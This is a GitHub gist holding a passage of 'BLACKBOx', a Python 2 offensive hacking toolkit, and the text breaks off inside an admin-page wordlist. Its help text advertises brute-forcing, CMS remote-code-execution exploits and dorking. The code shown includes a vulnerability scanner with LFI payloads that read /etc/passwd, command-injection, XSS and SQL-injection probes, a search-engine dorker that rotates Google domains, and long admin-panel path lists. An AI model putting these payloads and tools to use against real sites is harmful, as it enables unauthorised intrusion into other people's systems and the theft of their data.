Last active
January 14, 2023 20:37
-
-
Save JonnoFTW/9dc6d709194125ec6e9f29fd5cb7ef2c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2 | |
#####################################NOTICE###################################### | |
### This program is free software: you can redistribute it and/or modify ### | |
### it under the terms of the GNU General Public License as published by ### | |
### the Free Software Foundation, either version 3 of the License, or ### | |
### (at your option) any later version. ### | |
### This program is distributed in the hope that it will be useful, ### | |
### ### | |
### but WITHOUT ANY WARRANTY; without even the implied warranty of ### | |
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ### | |
### GNU General Public License for more details. ### | |
### You should have received a copy of the GNU General Public License ### | |
### along with this program. If not, see <http://www.gnu.org/licenses/> ### | |
################################################################################# | |
################################################################################################################################ | |
### I edit some tools from other repository like : ### | |
### JOOMLA RCE : https://www.exploit-db.com/exploits/39033/ ### | |
### MAGENTO RCE : https://www.exploit-db.com/exploits/37977/ ### | |
### PRESTASHOP EXPLOIT : http://0day.today/exploit/25260 , http://0day.today/exploit/25261 , http://0day.today/exploit/25259 ### | |
### ADMIN PAGE FINDER : https://packetstormsecurity.com/files/112855/Admin-Page-Finder-Script.html ### | |
### XSS/SQLI/RCE SCANNER FROM : https://github.com/zigoo0/webpwn3r ! ### | |
################################################################################################################################ | |
import requests,json,sys, time, re, os, base64, random,hashlib,timeit,ftplib,pexpect,urllib2,urllib | |
from sys import platform | |
from time import gmtime, strftime | |
from optparse import OptionParser | |
from passlib.hash import nthash | |
from urllib import FancyURLopener | |
from passlib.hash import mssql2000 as m20,oracle11 as oracle11,mssql2005 as m25, mysql323, mysql41 | |
from pexpect import pxssh | |
from ftplib import FTP | |
__nickname__ = 'BLACK EYE' | |
__author__ = 'Saad Hat' | |
__bitbucket__ = 'https://bitbucket.org/darkeye/' | |
__emailadd__ = 'blackdoor197@riseup.net' | |
__twitter__ = 'https://twitter.com/S44DH4T' | |
__facebook__ = 'https://facebook.com/S44DH4T' | |
__version__ = '2.0' | |
__license__ = 'GPLv2' | |
__scrname__ = 'BLACKBOx v%s' % (__version__) | |
def __banner__(): | |
print (color.BOLD+color.Y+" _____ __ _____ _____ _____ _____ _____ ") | |
print (color.BOLD+color.Y+"| __ | | | _ | | | | __ | | _ _") | |
print (color.BOLD+color.Y+"| __ -| |__| | --| -| __ -| | ||_'_|") | |
print (color.BOLD+color.Y+"|_____|_____|__|__|_____|__|__|_____|_____||_,_|") | |
print (color.W+color.BOLD+" {"+color.R+__version__+"#Dev"+color.W+"}"+color.ENDC) | |
def __help__(): | |
print (color.W+color.BOLD+"Usage : "+color.W+sys.argv[0]+color.R+" {Module}"+color.W+" -h/--help"+color.ENDC) | |
print (color.BOLD+color.Y+"Bruteforcing : "+color.ENDC) | |
print (color.W+"\t+ Wordpress Bruteforce : wordpress_brute | Bruteforcing WP PANEL") | |
print (color.W+"\t+ Admin Page Finder : admin_brute | Find Admin Page") | |
#print (color.W+"\t+ PMA Page Finder : pma_brute | Find PhpMyAdmin Page") | |
print (color.W+"\t+ SSH Bruteforce : ssh_brute | Bruteforcing SSH LOGIN") | |
print (color.W+"\t+ FTP Bruteforce : ftp_brute | Bruteforcing FTP LOGIN") | |
print (color.W+color.BOLD+color.Y+"Information Gathering : "+color.ENDC) | |
print (color.W+"\t+ Dnsinfo : dns_info | Get All Website from IP") | |
print (color.W+color.BOLD+color.Y+"Exploit : "+color.ENDC) | |
print (color.W+"\t+ Joomla Rce : rce_joomla | 1.5 - 3.4.5 remote code execution") | |
print (color.W+"\t+ Magento Rce : rce_magento | Magento eCommerce - Remote Code Execution") | |
print (color.W+"\t+ PrestaShop Exploit : presta_exploit | Prestashop Multi Modules Arbitrary File Upload Exploit") | |
print (color.W+color.BOLD+color.Y+"Dorking : "+color.ENDC) | |
print (color.W+"\t+ Google Dorker : google_dorker(LFI/RCE/XSS/SQLi) | Google Dorker ") | |
print (color.W+"\t+ Bing Dorker : bing_dorker(LFI/RCE/XSS/SQLi) | Bing Dorker via IP") | |
print (color.W+"\t+ Scan List : scan_list(LFI/RCE/XSS/SQLi) | Scan url in list !") | |
print (color.W+color.BOLD+color.Y+"Cracking : "+color.ENDC) | |
print (color.W+"\t+ Crack Hash MD5-SHA512 : hash_killer | Crack Hash\n\t\t SHA1-SHA224\n\t\t SHA256-SHA384\n\t\t MSSQL2000-MSSQL2005\n\t\t MYSQL41-ORACLE11\n\t\t MYSQL323 HASHs") | |
def __update__(): | |
pass | |
def request_get(url, params=None, **kwargs): | |
print(url) | |
return requests.get(url, params=None, **kwargs) | |
def request_post(url, data=None, json=None, **kwargs): | |
print(url) | |
return requests.post(url, data=None, json=None, **kwargs) | |
class color: | |
P = '\033[95m' # purple | |
B = '\033[94m' # Blue | |
BOLD = '\033[1m' # Bold | |
G = '\033[92m' # Green | |
Y = '\033[93m' # Yellow | |
R = '\033[91m' # Red | |
W = '\033[97m' # White | |
BL = '\033[90m' # Black | |
M = '\033[95m' # Magenta | |
C = '\033[96m' # Cyan | |
ENDC = '\033[0m' # end colors | |
if sys.platform == 'win32': | |
P = '' # purple | |
B = '' # Blue | |
BOLD = '' # Bold | |
G = '' # Green | |
Y = '' # Yellow | |
R = '' # Red | |
W = '' # White | |
BL = '' # Black | |
M = '' # Magenta | |
C = '' # Cyan | |
ENDC = '' # end colors | |
### | |
###SCANNER TOOLS | |
### | |
#################################### | |
## ## | |
## LFI/SQLI/RCE/XSS ## | |
## ## | |
#################################### | |
class UserAgent(FancyURLopener): | |
version = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0' | |
useragent = UserAgent() | |
class HTTP_HEADER: | |
HOST = "Host" | |
SERVER = "Server" | |
class scanner: | |
burl,gurl = [],[] | |
def headers_reader(self,url): | |
print color.BOLD+"\t[!] Fingerprinting the backend Technologies."+color.ENDC | |
opener = urllib.urlopen(url) | |
if opener.code == 200: | |
print color.G+"\t[!] Status code: 200 OK"+color.ENDC | |
if opener.code == 404: | |
print color.R+"\t[!] Page was not found! Please check the URL \n"+color.ENDC | |
exit() | |
Server = opener.headers.get(HTTP_HEADER.SERVER) | |
Host = url.split("/")[2] | |
print color.G+"\t[!] Host: " + str(Host) +color.ENDC | |
print color.G+"\t[!] WebServer: " + str(Server) +color.ENDC | |
for item in opener.headers.items(): | |
for powered in item: | |
sig = "x-powered-by" | |
if sig in item: | |
print color.G+ "\t[!] " + str(powered).strip() + color.ENDC | |
def lfi(self, url): | |
payloads=["../etc/passwd","../etc/passwd%00","../../etc/passwd","../../etc/passwd%00","../../../etc/passwd","../../../etc/passwd%00","../../../../etc/passwd","../../../../etc/passwd%00","../../../../../etc/passwd","../../../../../etc/passwd%00","../../../../../../etc/passwd","../../../../../../etc/passwd%00","../../../../../../../etc/passwd","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd%00","..%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd%2500","..%2F..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500"] | |
lfi = re.findall(r'=(.*)', url) | |
for i in lfi: | |
print (color.R+color.BOLD+"[+] "+color.W+"TARGET : "+url+color.ENDC) | |
l=re.sub(i, '', url) | |
vuln = 0 | |
for payload in payloads: | |
payload=payload.strip() | |
print (color.G+color.BOLD+"\t[+] "+color.W+" Payload : "+payload+color.ENDC) | |
lfii = l+payload | |
r = request_get(lfii) | |
html = r.content | |
if "root" in html: | |
print (color.R+color.BOLD+"\t[+] "+color.R+" LFI FOUND : "+lfii+color.ENDC) | |
vuln+=1 | |
else: | |
print (color.B+color.BOLD+"\t[+] "+color.B+" NOT FOUND : "+lfii+color.ENDC) | |
pass | |
print color.W+"[!] %i LFI FOUNDED " % (vuln) +color.ENDC | |
def run(self,url, payloads, check): | |
opener = request_get(url) | |
vuln = 0 | |
print color.B+"[+] "+color.W+"Target : "+url+color.ENDC | |
#print color.B+"\t[+] "+color.W+"IP : "+socket.gethostbyname(url)+color.ENDC | |
if opener.status_code == 999: | |
print color.R +" [~] WebKnight WAF Detected!"+color.ENDC | |
print color.R +" [~] Delaying 3 seconds between every request"+color.ENDC | |
time.sleep(3) | |
if "&" in url: | |
for params in url.split("?")[1].split("&"): | |
for payload in payloads: | |
bugs = url.replace(url, url + str(payload).strip()) | |
request = useragent.open(bugs) | |
html = request.readlines() | |
for line in html: | |
checker = re.findall(check, line) | |
if len(checker) !=0: | |
print color.R+"\t[*] Payload : " ,payload +color.ENDC | |
print color.B+"\t[*] FOUND : "+color.ENDC + bugs | |
vuln +=1 | |
else: | |
for payload in payloads: | |
bugs = url.replace(url, url + str(payload).strip()) | |
request = useragent.open(bugs) | |
html = request.readlines() | |
for line in html: | |
checker = re.findall(check, line) | |
if len(checker) !=0: | |
print color.R+"\t[*] Payload : " ,payload +color.ENDC | |
print color.B+"\t[*] FOUND : "+color.ENDC + bugs | |
vuln +=1 | |
if vuln == 0: | |
print color.G+"\t[!] Target is not vulnerable!"+color.ENDC | |
else: | |
print color.C+"\t[!] %i bugs :-) " % (vuln) +color.ENDC | |
def rce(self,url): | |
self.headers_reader(url) | |
payloads = [';${@print(md5(zigoo0))}', ';${@print(md5("zigoo0"))}'] | |
payloads += ['%253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B'] | |
payloads += [';uname;', '&&dir', '&&type C:\\boot.ini', ';phpinfo();', ';phpinfo'] | |
check = re.compile("51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot", re.I) | |
self.run(url, payloads, check) | |
def xss(self,url): | |
payloads = ['%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb', '%78%22%78%3e%78'] | |
payloads += ['%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb', 'zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb'] | |
check = re.compile('zigoo0<svg|x>x', re.I) | |
self.run(url, payloads, check) | |
def sqli(self,url): | |
payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] | |
check = re.compile("SQL syntax|Incorrect syntax|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) | |
self.run(url, payloads, check) | |
### | |
###DORKING TOOLS | |
### | |
#################################### | |
## ## | |
## DORKER ## | |
## ## | |
#################################### | |
class dorker: | |
gurl,burl=[],[] | |
def google(self, dork, start, stop): | |
from cookielib import LWPCookieJar | |
from urllib2 import Request, urlopen | |
from urlparse import urlparse, parse_qs | |
home_folder = os.getenv('HOME') | |
if not home_folder: | |
home_folder = os.getenv('USERHOME') | |
if not home_folder: | |
home_folder = '.' | |
cookie_jar = LWPCookieJar(os.path.join(home_folder, '.google-cookie')) | |
try: | |
cookie_jar.load() | |
except Exception: | |
pass | |
def randomm(): | |
tld = ['ae', 'am', 'as', 'at','az', 'ba', 'be', 'bg','bi', 'bs', 'ca', 'cd','cg', 'ch', 'ci', 'cl','co.bw', 'co.ck', 'co.cr', 'co.hu','co.id', 'co.il', 'co.im', 'co.in','co.je', 'co.jp', 'co.ke', 'co.kr','co.ls', 'co.ma', 'co.nz', 'co.th','co.ug', 'co.uk', 'co.uz', 'co.ve','co.vi', 'co.za', 'co.zm', 'com','com.af', 'com.ag', 'com.ar', 'com.au','com.bd', 'com.bo', 'com.br', 'com.bz','com.co', 'com.cu', 'com.do', 'com.ec','com.eg', 'com.et', 'com.fj', 'com.gi','com.gt', 'com.hk', 'com.jm', 'com.kw','com.ly', 'com.mt', 'com.mx', 'com.my','com.na', 'com.nf', 'com.ni', 'com.np','com.om', 'com.pa', 'com.pe', 'com.ph','com.pk', 'com.pr', 'com.py', 'com.qa','com.sa', 'com.sb', 'com.sg', 'com.sv','com.tj', 'com.tr', 'com.tw', 'com.ua','com.uy', 'com.uz', 'com.vc', 'com.vn','cz', 'de', 'dj', 'dk','dm', 'ee', 'es', 'fi','fm', 'fr', 'gg', 'gl','gm', 'gr', 'hn', 'hr','ht', 'hu', 'ie', 'is','it', 'jo', 'kg', 'kz','li', 'lk', 'lt', 'lu','lv', 'md', 'mn', 'ms','mu', 'mw', 'net','nl','no', 'nr', 'nu', 'pl','pn', 'pt', 'ro', 'ru','rw', 'sc', 'se', 'sh','si', 'sk', 'sm', 'sn','tm', 'to', 'tp', 'tt','uz', 'vg', 'vu', 'ws'] | |
tld_rand = random.sample(tld, 1) | |
for tldd in tld_rand: | |
return tldd | |
def html(url): | |
request = Request(url) | |
request.add_header('User-Agent', | |
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)') | |
cookie_jar.add_cookie_header(request) | |
response = urlopen(request) | |
cookie_jar.extract_cookies(response, request) | |
html = response.read() | |
response.close() | |
cookie_jar.save() | |
return html | |
def run(dork, start, stop): | |
tldd = randomm() | |
while start<stop: | |
url = "http://www.google."+tldd+"/search?q="+dork+"&start="+str(start)+"&inurl=https" | |
htmll = html(url) | |
link = re.findall(r'<h3 class="r"><a href="(.*?)"',htmll) | |
for i in link: | |
i=i.strip() | |
o = urlparse(i, 'http') | |
gopen = open("gurl.txt","a") | |
if i.startswith('/url?'): | |
link = parse_qs(o.query)['q'][0] | |
self.gurl.append(link) | |
gopen.write(str(link+"\n")) | |
start+=10 | |
print (color.G+color.BOLD+"[+]"+color.BOLD+color.W+" "+str(len(self.gurl))+" FOUND") | |
tldd = randomm() | |
print (color.G+color.BOLD+"[+]"+color.BOLD+color.W+" GOOLGE TLD : ."+tldd) | |
print (color.G+color.BOLD+"[+]"+color.BOLD+color.W+" DORK : "+dork+color.ENDC) | |
run(dork, start, stop) | |
def bing(self, ip,dork): | |
url = [] | |
print (color.G+color.BOLD+"[+]"+color.BOLD+color.W+" DORK : "+dork) | |
page = 0 | |
bopen = open("burl.txt","a") | |
while page <= 102: | |
bing ='http://www.bing.com/search?q=ip:'+ip+'+'+dork+'&count=50&first='+str(page) | |
get = request_get(bing) | |
html = get.content | |
link = re.findall(r'<h2><a href="(.*?)"', html) | |
for i in link: | |
url.append(i) | |
self.burl.append(i) | |
bopen.write(i+"\n") | |
page += 50 | |
print (color.G+color.BOLD+"[+]"+color.BOLD+color.W+" "+str(len(url))+" FOUND"+color.ENDC) | |
pass | |
class admin_finder: | |
php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', | |
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', | |
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', | |
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', | |
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', | |
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', | |
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', | |
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', | |
'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', | |
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', | |
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', | |
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', | |
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', | |
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', | |
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', | |
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', | |
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', | |
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php', | |
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'] | |
asp = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', | |
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', | |
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', | |
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', | |
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', | |
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', | |
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', | |
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', | |
'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', | |
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', | |
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', | |
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', | |
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', | |
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', | |
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', | |
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', | |
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', | |
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', | |
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'] | |
cfm = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', | |
'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm', | |
'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', | |
'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html', | |
'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', | |
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', | |
'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm', | |
'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm', | |
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm', | |
'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm', | |
'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html', | |
'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html', | |
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', | |
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', | |
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html', | |
'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm', | |
'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm', | |
'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm', | |
'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm'] | |
js = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', | |
'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js','admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', | |
'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html', | |
'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', | |
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', | |
'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js', | |
'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js', | |
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js', | |
'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js', | |
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html', | |
'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html', | |
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', | |
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', | |
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html', | |
'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js', | |
'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js', | |
'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js', | |
'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js'] | |
cgi = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', | |
'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi', | |
'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', | |
'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html', | |
'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', | |
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', | |
'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi', | |
'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi', | |
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi', | |
'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi', | |
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html', | |
'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html', | |
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', | |
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', | |
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html', | |
'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi', | |
'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi', | |
'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi', | |
